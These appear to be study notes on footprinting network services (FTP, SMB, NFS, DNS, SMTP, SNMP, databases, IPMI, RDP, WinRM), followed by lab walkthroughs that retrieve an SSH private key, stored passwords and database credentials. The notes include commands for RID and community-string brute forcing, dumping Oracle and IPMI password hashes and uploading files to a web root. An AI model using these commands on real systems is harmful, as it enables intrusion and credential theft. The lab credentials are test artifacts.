Intro

information gathering using active (scans) and passive (use of third-party providers) methods.

Enumeration Mythology

Infrastructure Based Enumeration

Domain Information

passively gathering information to understand the company better.

getting first impression of its presence on the internet using their SSL certificate

another source to find more subdomains is crt.sh

# output results in JSON format from crt.sh
curl -s https://crt.sh/\?q\=inlanefreight.com\&output\=json | jq .

# filter results by unique subdomain
curl -s https://crt.sh/\?q\=inlanefreight.com\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u

# identify hosts direct accessible from the internet
for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f1,4;done

Shodan can be used to find devices and systems permanently connected to the internet

1
2
3

for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f4 >> ip-addresses.txt;done

for i in $(cat ip-addresses.txt);do shodan host $i;done

see all available DNS records

1	`dig any inlanefreight.com`

Cloud Resources

1 2	`# ip lookup for i in $(cat subdomainlist);do host $i \| grep "has address" \| grep inlanefreight.com \| cut -d" " -f1,4;done`

cloud storage can be found in DNS; During IP lookup, its possible to find an IP that belongs to cloud service

using google dorks we can find cloud storages using inurl:amazonaws.com intext:companyname for AWS and inurl:blob.core.windows.net intext:companyname for Azure

webpage source codes can also have mentions

domain.glass can tell us about the company’s infrastructure

GrayHatWarfare can do different searches, discover cloud storages, files and SSH keys

Staff

employees can be identified on business networks like Linkedin, Xing, etc

from job posts we can tell what technologies the company uses (Java, MySQL, Flask, etc)

from employee profile, we can get linked sites to personal projects, github page, etc

from technical employees profiles we can also get infrastructure and technology the company is likely using

Host Based Enumeration

FTP

FTP runs on application layer

for FTP connection, client & server establish channel through port 21 - client sends commands to server & the server returns status code - then participants establish data channel on port 20

FTP can be in active and passive mode
- in active, when client establishes connection it also informs the server via which client side port the server can transmit the response (less secure because client has to open ports)
- in passive, the server announces a port through which the client can establish the data channel
TFTP
TFTP (Trivial FTP) is simpler than FTP, uses UDP instead of TCP and doesn’t require user authentication

most used FTP server on Linux distros is vsFTPd and config can be found in /etc/vsftpd.conf- some settings are predefined by default

Dangerous settings:
anonymous_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
no_anon_password=YES
anon_root=/home/username/ftp
write_enable=YES
Anonymous Login / Status / Detailed Output

# anonymous login
ftp 10.129.14.136

# overview of server's settings
status

# show us more information
debug
trace

Footprinting

# list nmap ftp scripts 
find / -type f -name ftp* 2>/dev/null | grep scripts

# nmap scan using version scan (-sV), aggressive scan (-A), and the default script scan (-sC)
sudo nmap -sV -p21 -sC -A 10.129.14.136

# service interaction
nc -nv 10.129.14.136 21
telnet 10.129.14.136 21

# ftp server with TLS/SSL
openssl s_client -connect 10.129.14.136:21 -starttls ftp

SMB

is a client-server protocol for sharing files, printers and other network resources for Windows system

Samba is an alternative implementation of SMB for Unix operating systems which uses the Common Internet File System (CIFS) network protocol
default configuration can be found at /etc/samba/smb.conf

1	`cat /etc/samba/smb.conf \| grep -v "#\\|\;"`

Dangerous Settings:
browseable = yes
read only = no
writable = yes
guest ok = yes
enable privileges = yes
create mask = 0777
directory mask = 0777
logon script = script.sh
magic script = script.sh
magic output = script.out

Footprinting

# list shares
smbclient -N -L //10.129.14.128

# connect to share
smbclient //10.129.14.128/notes

# download from share
get prep-prod.txt 

# !<cmd> to execute local system commands
!ls

# on smb server to see status
smbstatus

# nmap scan services
sudo nmap 10.129.14.128 -sV -sC -p139,445

# we can use tools like rpcclient to perform MS-RPC functions
rpcclient -U "" 10.129.14.128

# rpcclient - enum
srvinfo
enumdomains
querydominfo
netshareenumall
netsharegetinfo <share>
enumdomusers
queryuser <RID>

# rpcclient - user enum
enumdomusers
queryuser 0x3e9

#rpcclient - group info
querygroup 0x201

# brute force user RIDs
for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

# alternative to to bruteforcing - Impacket script samrdump.py
samrdump.py 10.129.14.128

# info we obtained from rpc client can be obtained using:
# SMBMap and CrackMapExec
smbmap -H 10.129.14.128

crackmapexec smb 10.129.14.128 --shares -u '' -p ''

# older tool, enum4linux
# automates many of the queries, but not all
./enum4linux-ng.py 10.129.14.128 -A

NFS

has the same purpose of SMB for Linux and Unix systems

the protocol has no authentication or authorization; instead RPC protocol is used for authentication and authorization is derived from file system information

most common authentication is via UNIX UID/GID and group memberships

/etc/exports contains a table of physical filesystems on an NFS server; it also contains examples of configuring NFS shares

Dangerous Settings

rw
insecure
nohide
no_root_squash

Footprinting

sudo nmap 10.129.14.128 -p111,2049 -sV -sC

# nmap with NFS scripts
sudo nmap --script nfs* 10.129.14.128 -sV -p111,2049

# show avaialable NFS shares
showmount -e 10.129.14.128

# create empty folder to mount the share
# mount share to folder
mkdir target-NFS
sudo mount -t nfs 10.129.14.128:/ ./target-NFS/ -o nolock
cd target-NFS
tree .

# we can get access by creating the same usernames, group names, UIDs and GUIDs in our system to view and modify the files
# list content with username and group names
ls -l mnt/nfs/
# list contents with uids and guids
ls -n mnt/nfs/

# unmount
cd ..
sudo umount ./target-NFS

# if root_sqauash is set we cannot edit even as root

DNS

is used to resolve domain names to IP addresses
types of DNS servers:
- DNS root server
- Authoritative name server
- Non-authoritative name server
- Caching server
- Forwarding server
- Resolver

DNS queries are unencrypted by default but can be encrypted using DoT, DoH or DNSCrypt network protocol
it stores information about services associated with the domain like mail server, etc

different DNS records are used for DNS queries:


`A`	Returns an IPv4 address of the requested domain as a result.
`AAAA`	Returns an IPv6 address of the requested domain.
`MX`	Returns the responsible mail servers as a result.
`NS`	Returns the DNS servers (nameservers) of the domain.
`TXT`	This record can contain various information.
`CNAME`	This record serves as an alias for another domain name
`PTR`	The PTR record works the other way around (reverse lookup). It converts IP addresses into valid domain names.
`SOA`	Provides information about the corresponding DNS zone and email address of the administrative contact.

all DNS servers work with 3 different types of config files:
1. local DNS configuration files
2. zone files
3. reverse name resolution files
Bind9 server is often used on Linux based distros; the local config file named.conf is divided into:
- named.conf.local
- named.conf.options
- named.conf.log
zones are divided into individual files and is used to describe a zone completely; found in /etc/bind/db.domain.com
reverse name resolution zone files are used for PTR records to map IP address to FQDN; found in /etc/bind/db.10.129.14
dangerous settings:
- allow-query
- allow-recursion
- allow-transfer
- zone-statistics

Footprinting

# query NS using specific DNS server with @
dig ns inlanefreight.htb @10.129.14.128

# query version
dig CH TXT version.bind 10.129.120.85

# query all records
dig any inlanefreight.htb @10.129.14.128

# AXFR zone transfer 
dig axfr inlanefreight.htb @10.129.14.128

# AXFR zone transfer - internal
dig axfr internal.inlanefreight.htb @10.129.14.128

# subdomain brute force
for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

# enumerate subdomains using DNSEnum
dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

SMTP

Simple Mail Transfer Protocol is a protocol for sending emails; used between an email client and an outgoing server or between two SMTP servers
is often combined with IMAP or POP3 protocols
its unencrypted and transmits all data in plaintext and uses port 25
newer SMTP servers which are ESMTP are encrypted with SSL/TLS and use port 465 or 587; use AUTH PLAIN for authentication
mail workflow:
Client (MUA)➞Submission Agent (MSA)➞Open Relay (MTA) ➞Mail Delivery Agent (MDA) ➞ Mailbox (POP3/IMAP)
default config can be found in /etc/postfix/main.cf

interacting with an SMTP server:

# connect to a server
telnet 10.129.14.128 25

# init a session
HELO mail1.inlanefreight.htb

# VRFY can be used to enumerate users
# server may issue code 252 and cofirm existence of user that doesn't exist
VRFY root
VRFY username

# send an email
MAIL FROM: <cry0l1t3@inlanefreight.htb>

RCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure


DATA

From: <cry0l1t3@inlanefreight.htb>
To: <mrb3n@inlanefreight.htb>
Subject: DB
Date: Tue, 28 Sept 2021 16:32:51 +0200
Hey man, I am trying to access our XY-DB but the creds dont work. 
Did you make any changes there?

# terminate session
QUIT

dangerous settings:
- open relay config: mynetworks = 0.0.0.0/0 - the server can send fake emails and init communicaton between multiple parties; can also spoof an email and read it

Footprinting

# default nmap script includes smtp-commands
sudo nmap 10.129.14.128 -sC -sV -p25

# to identify the SMTP target as open relay
sudo nmap 10.129.14.128 -p25 --script smtp-open-relay

IMAP / POP3

Internet Message Access Protocol (IMAP) is used to access emails from a mail server; it allows online management of emails and supports folder structures
Post Office Protocol (POP3) only provides listing, retrieving and deleting emails as function
IMAP is unencrypted by default and uses port 143; can be encrypted with SSL/TLS on port 993
POP3 uses ports 110 and 995 by default; can be encrypted on port 995
dangerous settings:
- auth_debug
- auth_debug_passwords
- auth_verbose
- auth_verbose_passwords
- auth_anonymous_username

Footprinting

sudo nmap 10.129.14.128 -sV -p110,143,993,995 -sC

# login to the mail server with credentials
curl -k 'imaps://10.129.14.128' --user user:p4ssw0rd

# with verbose, to see version of TLS, SSL certificate, banner, and version of the mail server
curl -k 'imaps://10.129.14.128' --user cry0l1t3:1234 -v


# we can use openssl or ncat to ineract with IMAP or POP3 over SSL
openssl s_client -connect 10.129.14.128:pop3s

openssl s_client -connect 10.129.14.128:imaps

SNMP

Simple Network Management Protocol (SNMP) is used to monitor network devices, configure tasks and change settings remotely
the client can transmit control commands to the server using agents on UDP port 161
SNMP can also enable traps over UDP 162 which sends data packets from the SNMP server to the client without being requested
MIB contains at least one Object Identifier (OID) which contains unique address and a name, also contains information about type, access rights and description of the SNMP object
OIDs represent nodes in a hierarchical namespace and are identified by a unique sequence of numbers and usually concatenated by dot notations
SMNPv1 supports information retrieval and configuring of network devices; no built-in authentication mechanism and no encryption
SMNPv2 has many version but ‘v2c’ is more common; is extended with additional functions; community string (which provides security) is transmitted in plain text; no encryption
SMNPv3 has security feature such as authentication using username and password and transmission encryption of the data (via pre-shared key)
default configuration can be found at /etc/snmp/snmpd.conf
dangerous settings:
- rwuser noauth
- rwcommunity <community string> <IPv4 address>
- rwcommunity6 <community string> <IPv6 address>

Footprinting

# query the OIDs with their information
snmpwalk -v2c -c public 10.129.14.128

# brute-force names of the community string
onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt 10.129.14.128

# brute-force indiviual OIDs and enumerate the information behind them
# we need to know a community string first
sudo apt install braa
braa <community string>@<IP>:.1.3.6.*   # Syntax
braa public@10.129.14.128:.1.3.6.*

MySQL

MySQL is an opensource SQL relational database management system
databases are stored in a single .sql file
clients can retrieve and edit data using SQL based language queries
default configuration can be found at /etc/mysql/mysql.conf.d/mysqld.cnf
dangerous settings:
- user
- password
- admin_address
- debug
- sql_warnings
- secure_file_priv

Footprinting

# nmap using mysql scripts
sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

# login to mysql server
mysql -u root -pP4SSw0rd -h 10.129.14.128

# queries
show databases;    

select version();

use mysql;

show tables;

show columns from <table>;

select * from <table>;

select * from <table> where <column> = "<string>";

MSSQL

is Microsft’s SQL-based relational database management system
mostly used in Windows operating systems
SQL Server Management Studio is usually used to manage the databases
many clients can used to access databases running on MSSQL like:
- mssql-cli
- SQL Server Powershell
- HeidiSQL
- SQLPro
- impacket-mssqlclient
dangerous settings:
- not using encryption when connecting to MSSQL server
- using self-signed certificates
- using name pipes
- weak and default sa credentials

Footprinting

# nmap mssql script scan
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248

# mssql ping in metasploit
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248

msf6 auxiliary(scanner/mssql/mssql_ping) > run

# connecting with mssqlclient
impacket-mssqlclient Administrator@10.129.201.248 -windows-auth

select name from sys.databases

Orcale TNS

Oracle TNS is server a to facilitate communication between Oracle databases and applications over networks
listener uses port TCP/1521 by default, and supports IPX/SPX, UDP and AppleTalk
has built-in encryption mechanisms and supports IPv6 and SSL/TLS encryption
configuration files are called tnsnames.ora and listener.ora are located at $ORACLE_HOME/network/admin
Orcale 9 has a default password CHANGE_ON_INSTALL, and DBSNMP service uses default password dbsnmp
packages and tools to enumerate TNS listener and interact with it:

$ sudo apt-get update
sudo apt-get install -y build-essential python3-dev libaio1
cd ~
wget https://files.pythonhosted.org/packages/source/c/cx_Oracle/cx_Oracle-8.3.0.tar.gz
tar xzf cx_Oracle-8.3.0.tar.gz
cd cx_Oracle-8.3.0
python3 setup.py build
sudo python3 setup.py install
cd ~
git clone https://github.com/quentinhardy/odat.git
cd odat/
pip install python-libnmap
git submodule init
git submodule update
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

testing ODAT (ODAT is pentesting tool designed to enumerate and exploit vulnerabilities in Oracle database)

1	`./odat.py -h`

Footprinting

sudo nmap -p1521 -sV 10.129.204.235 --open

# SID is used to identify DB instances
# brutefoce SID
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

# odat can scan to enumerate the orcale db
./odat.py all -s 10.129.204.235

# connect to db and interact if we have creds
sqlplus scott/tiger@10.129.204.235/XE

select table_name from all_tables;

select * from user_role_privs;

# test if user has sysdba access
# we can retreive password hashes and try to crack them offline
sqlplus scott/tiger@10.129.204.235/XE as sysdba

select name, password from sys.user$;

# we can upload webshell
# target needs to have a web server running
# linux default path /var/www/html
# windows default path C:\inetpub\wwwroot
echo "Oracle File Upload Test" > testing.txt

./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

curl -X GET http://10.129.204.235/testing.txt


# if came across this error: sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

IPMI

Intelligent Platform Management Interface is a set of standardized specifications for hardware based host management
used for system management and monitoring even when host is powered down and or has system failure

Footprinting

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

# metasploit version scan
use auxiliary/scanner/ipmi/ipmi_version 
set rhosts 10.129.5.224
show options 
run

# retreive IMPI hashes
use auxiliary/scanner/ipmi/ipmi_dumphashes 

# crack ipmi hashed password
hashcat -m 7300 hash.txt --wordlist /usr/share/wordlists/rockyou.txt

Remote Management Protocols

Linux

SSH

SSH enables two computers to establish an encrypted and direct connection on port tcp/22
SSH servers can be configured to only allows connections from specific clients
linux distributions use the opensource OpenBSD SSH (OpenSSH)
SSH-2 is more advanced encryption, speed, stability and security than SSH-1
the most common authentication method used is Public-key authenticated; OpenSSH has 6 different authentication methods:
- Password
- Public-key
- Host-based
- Keyboard
- Challenge-response
- GSSAPI
default configuration can be found /etc/ssh/sshd_config
dangerous settings:
- PasswordAuthentication yes
- PermitEmptyPasswords yes
- PermitRootLogin yes
- Protocol 1
- X11Forwarding yes
- AllowTcpForwarding yes
- PermitTunnel
- DebianBanner yes

Footprinting

# fingerprint the SSH server
git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
./ssh-audit.py 10.129.14.132

# can output authentication methods used
ssh -v cry0l1t3@10.129.14.132

# for brute-froce attacks we can specify authentication method
ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password

Rysnc

Rsync is a fast efficient tool for location and remotely copying files
it is often used for backup and monitoring
by default, it uses port tcp/873 and can be configured to use SSH for secure file transfers

Footprinting

# scan for rysnc
sudo nmap -sV -p 873 127.0.0.1

# probe accessible shares
nc -nv 127.0.0.1 873

# enumerate an open share
rsync -av --list-only rsync://127.0.0.1/dev

R-services

R-services are suite of services hosted to enable remote access or issue commands between Unix hosts over TCP/IP
is only accessible through a suite of programs known as r-commands; they span across the ports 512, 513, and 514
r-commands consists of the following:
- rcp (remote copy)
- rexec (remote execution)
- rlogin (remote login)
- rsh (remote shell)
- rstat
- ruptime
- rwho (remote who)
most abused commands are rcp, rsh, rexec and rlogin
list of trusted hosts can be found at /etc/hosts.equiv

Footprinting

# scan
sudo nmap -sV -p 512,513,514 10.0.17.2

# login if .rhosts is misconfigured
rlogin 10.0.17.2 -l htb-student

# if logged in, list authenticated users using rwho
rwho

# list authenticated users with Rusers
rusers -al 10.0.17.5

Windows

RDP

Remote Desktop Protocol is created by Microsoft for remote access to computers running Windows
allows display and control commands to be transmitted via GUI encrypted over IP networks
works at the application layer and uses port tcp/3389
has handled TLS/SSL which means all data is encrypted

Footprinting

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

# --packet-trace can be used to track the individual packages and inspect their contents manually
nmap -sV -sC 10.129.201.248 -p3389 --packet-trace --disable-arp-ping -n

# rdp-sec-check.pl can unauthnetically identify the security settings of RDP servers
sudo cpan

cpan[1]> install Encoding::BER

git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check

./rdp-sec-check.pl 10.129.201.248

# xfreerdp / rdesktop / Remmina can be used to RDP with GUI
xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248

WinRM

is a simple windows integrated remote management protocol based on the command line
uses the Simple Object Access Protocol (SOAP) to establish connections on port tcp/5985 and tcp/5986 for HTTPS
Windows Remote Shell (WinRS) is a component in WinRM that lets us execute arbitrary commands on the remote system

Footprinting

nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

# interact with winrm
evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!

WMI

Windows Management Instrumentation is an extension CIM; a core functionality of the standardized WBEM for the windows platform
allows read and write access to almost all settings on windows systems
is accessed via PowerShell, VBScript, or WMIC
consists of several programs and various databases known as repositories
initialization takes place on port tcp/135; moves to random port after successful connection

Footprinting

1	`/usr/share/doc/python3-impacket/examples/wmiexec.py Cry0l1t3:"P455w0rD!"@10.129.201.248 "hostname"`

Footprinting Lab - Easy

We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.

The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.

Additionally, our teammates have found the following credentials “ceil:qwer1234”, and they pointed out that some of the company’s employees were talking about SSH keys on a forum.

The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.

Let’s scan the network first

$ sudo nmap -sC -sV 10.129.42.195    
[sudo] password for kali: 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 11:18 -0500
Nmap scan report for 10.129.42.195
Host is up (0.22s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
|   256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_  256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
2121/tcp open  ftp     ProFTPD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Trying to login to SSH, it requires a private key

Using the credentials provided we login to FTP on port 21 but no files are present in the FTP server.

Logging to port 2121, we’re able to find the .ssh folder

$ ftp ftp://ceil:qwer1234@10.129.42.195 -P 2121

ftp> ls -la
229 Entering Extended Passive Mode (|||39575|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-------   1 ceil     ceil          294 Nov 10  2021 .bash_history
-rw-r--r--   1 ceil     ceil          220 Nov 10  2021 .bash_logout
-rw-r--r--   1 ceil     ceil         3771 Nov 10  2021 .bashrc
drwx------   2 ceil     ceil         4096 Nov 10  2021 .cache
-rw-r--r--   1 ceil     ceil          807 Nov 10  2021 .profile
drwx------   2 ceil     ceil         4096 Nov 10  2021 .ssh
-rw-------   1 ceil     ceil          759 Nov 10  2021 .viminfo

Download the private key

ftp> cd .ssh
ftp> ls -lah
229 Entering Extended Passive Mode (|||32992|)
150 Opening ASCII mode data connection for file list
drwx------   2 ceil     ceil         4.0k Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4.0k Nov 10  2021 ..
-rw-rw-r--   1 ceil     ceil          738 Nov 10  2021 authorized_keys
-rw-------   1 ceil     ceil         3.3k Nov 10  2021 id_rsa
-rw-r--r--   1 ceil     ceil          738 Nov 10  2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||6928|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |*******************************************************************************************************************|  3381       22.18 KiB/s    00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (4.75 KiB/s)
ftp>

We’ll now SSH using that key and grab the flag found at /home/flag

1	`$ ssh ceil@10.129.42.195 -i id_rsa`

Footprinting Lab - Medium

This second server is a server that everyone on the internal network has access to. In our discussion with our client, we pointed out that these servers are often one of the main targets for attackers and that this server should be added to the scope.

Our customer agreed to this and added this server to our scope. Here, too, the goal remains the same. We need to find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named HTB has been created. Accordingly, we need to obtain the credentials of this user as proof.

$ sudo nmap -sS 10.129.15.232
$ sudo nmap -sC -sV -p111,135,139,445,2049,3389,5985 10.129.15.232
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 12:28 -0500
Nmap scan report for 10.129.15.232
Host is up (0.31s latency).

PORT     STATE SERVICE       VERSION
111/tcp  open  rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nfs           2-4 (RPC #100003)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WINMEDIUM
| Not valid before: 2026-02-20T17:26:22
|_Not valid after:  2026-08-22T17:26:22
| rdp-ntlm-info: 
|   Target_Name: WINMEDIUM
|   NetBIOS_Domain_Name: WINMEDIUM
|   NetBIOS_Computer_Name: WINMEDIUM
|   DNS_Domain_Name: WINMEDIUM
|   DNS_Computer_Name: WINMEDIUM
|   Product_Version: 10.0.17763
|_  System_Time: 2026-02-21T17:29:28+00:00
|_ssl-date: 2026-02-21T17:29:37+00:00; -10s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-02-21T17:29:31
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 237.61 seconds

Connecting to share fails

1 2	`$ smbclient -N -L 10.129.15.232 session setup failed: NT_STATUS_ACCESS_DENIED`

NFS shows us one available

1
2
3

$ showmount -e 10.129.15.232
Export list for 10.129.15.232:
/TechSupport (everyone)

Let’s create a folder and mount share

1 2	`$ mkdir target-NFS $ sudo mount -t nfs 10.129.15.232:/TechSupport ~/target-NFS -o nolock`

We don’t have permissions to view the share

$ cd target-NFS            
cd: permission denied: target-NFS
$ ls target-NFS      
ls: cannot open directory 'target-NFS': Permission denied

Looks like root credentials are not squashed, which means we can access the directory as root

$ sudo bash -c 'id; ls -ldn /home/kali/target-NFS; ls -la /home/kali/target-NFS'
uid=0(root) gid=0(root) groups=0(root)
drwx------ 2 4294967294 4294967294 65536 Feb 21 12:26 /home/kali/target-NFS
<-SNIP->

Let’s change our user to root and access the server

1 2	`$ sudo -i # cd /home/kali/target-NFS`

The share contains a bunch of text files

1
2
3

# ls
ticket4238791283649.txt  ticket4238791283675.txt  ticket4238791283701.txt  ticket4238791283727.txt  ticket4238791283753.txt  ticket4238791283779.txt
<-SNIP->

The description mentions a user named HTB has been created, so we’re going to attempt to find that

# grep -Rin --color=auto "HTB" .     
./ticket4238791283782.txt:16: 2    host=smtp.web.dev.inlanefreight.htb
./ticket4238791283782.txt:21: 7    from="alex.g@web.dev.inlanefreight.htb"

The ticket we found contains the credentials for the user alex

# cat ticket4238791283782.txt
Conversation with InlaneFreight Ltd

Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,. 
 
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:

 1smtp {
 2    host=smtp.web.dev.inlanefreight.htb
 3    #port=25
 4    ssl=true
 5    user="alex"
 6    password="lol123!mD"
 7    from="alex.g@web.dev.inlanefreight.htb"
 8}
 9
<-SNIP->

Using these credentials we’re able to access the SMB shares

$ smbclient -L 10.129.15.232 -U alex%lol123\!mD

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        devshare        Disk      
        IPC$            IPC       Remote IPC
        Users           Disk

Connecting to the devshare Share, we found important.txt which contains credentials.
The username sa tells us that’s its probably credentials for Microsoft SQL Server Management Studio

$ smbclient //10.129.15.232/devshare -U alex%lol123\!mD
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Nov 10 11:12:22 2021
  ..                                  D        0  Wed Nov 10 11:12:22 2021
  important.txt                       A       16  Wed Nov 10 11:12:55 2021

                10328063 blocks of size 4096. 6101443 blocks available
smb: \> get important.txt
smb: \> !cat important.txt
sa:87N1ns@slls83

Going to RDP to the server using xfreerdp3

1	`$ xfreerdp3 /v:10.129.15.232 /u:alex /p:"lol123\!mD" /cert:ignore`

After connecting to the server, we see MSSMS on the desktop

We’ll run the application as Administrator (Right Click > Run as Administrator) and enter the password 87N1ns@slls83

There’s only one database called accounts

We’re going to Query the database and find the user HTB

SELECT * from dbo.devsacc;

<-SNIP->

id 157 
name HTB 
password lnch7ehrdn43i7AoqVPK4zWR

<-SNIP->

Footprinting Lab - Hard

The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.

$ ip=10.129.18.134; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 07:23 -0500
Nmap scan report for 10.129.18.134
Host is up (0.27s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
|   256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_  256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: UIDL TOP AUTH-RESP-CODE CAPA RESP-CODES SASL(PLAIN) PIPELINING USER STLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after:  2031-11-08T01:30:25
143/tcp open  imap     Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after:  2031-11-08T01:30:25
|_imap-capabilities: listed AUTH=PLAINA0001 post-login have ENABLE OK LOGIN-REFERRALS IDLE more capabilities Pre-login LITERAL+ STARTTLS ID SASL-IR IMAP4rev1
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after:  2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: listed AUTH=PLAINA0001 have ENABLE OK LOGIN-REFERRALS IDLE more post-login capabilities Pre-login LITERAL+ ID SASL-IR IMAP4rev1
995/tcp open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after:  2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

